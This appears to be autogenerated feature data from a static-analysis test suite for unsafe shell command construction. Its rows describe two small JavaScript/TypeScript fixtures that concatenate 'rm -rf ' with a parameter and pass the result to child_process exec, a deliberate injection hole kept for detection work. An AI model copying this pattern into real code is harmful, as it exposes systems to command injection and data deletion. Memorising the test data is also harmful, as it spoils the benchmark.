autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:3:15 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:3:15 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:3:15 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:3:15 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | 'arguments' object of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | exceptional return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | functio ... file.\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | functio ... file.\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | functio ... file.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:5:1 | return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:26:3:29 | name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:26:3:29 | name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:26:3:29 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:26:3:29 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:26:3:29 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:26:3:29 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:26:3:29 | name | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:26:3:29 | name | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:26:3:29 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:26:3:29 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:6 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:6 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:6 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:6 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:6 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:11 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:11 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:11 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:11 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:11 | cp.exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | exceptional return of cp.exec ... + name) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | exceptional return of cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:8:4:11 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:8:4:11 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:8:4:11 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:8:4:11 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:8:4:11 | exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:21 | "rm -rf " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:21 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:21 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:21 | "rm -rf " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:21 | "rm -rf " | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:21 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:25:4:28 | name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:25:4:28 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:25:4:28 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:25:4:28 | name | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:25:4:28 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:25:4:28 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:0 | this | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:0 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:1 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:1 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:1 | module | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:1 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:1 | require | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:1:1:1 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:5:1:6 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:5:1:6 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:5:1:33 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:5:1:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:5:1:33 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:5:1:33 | cp = re ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:5:1:33 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:5:1:33 | cp = re ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:16 | require | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:16 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:33 | exceptional return of require ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:33 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:33 | exceptional return of require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:33 | require ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:33 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:33 | require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:18:1:32 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:18:1:32 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:18:1:32 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:18:1:32 | "child_process" | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:18:1:32 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:18:1:32 | "child_process" | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:1:3:6 | module | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:1:3:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:1:3:6 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:1:3:14 | module.exports | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:1:3:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:1:3:14 | module.exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:1:5:1 | module. ... file.\\n} | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:1:5:1 | module. ... file.\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:1:5:1 | module. ... file.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:8:3:14 | exports | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:8:3:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:8:3:14 | exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:3:17 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:3:17 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:3:17 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:3:17 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:3:17 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:3:17 | this | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:3:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:3:17 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:3:17 | this | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:3:17 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | 'arguments' object of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | exceptional return of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | exceptional return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | functio ... file.\\n} | assignedToPropName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | functio ... file.\\n} | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | functio ... file.\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | functio ... file.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | return of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:18:5:1 | return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:28:3:31 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:28:3:31 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:28:3:31 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:28:3:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:3 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:3 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:3 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:8 | cp.exec | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:8 | cp.exec | 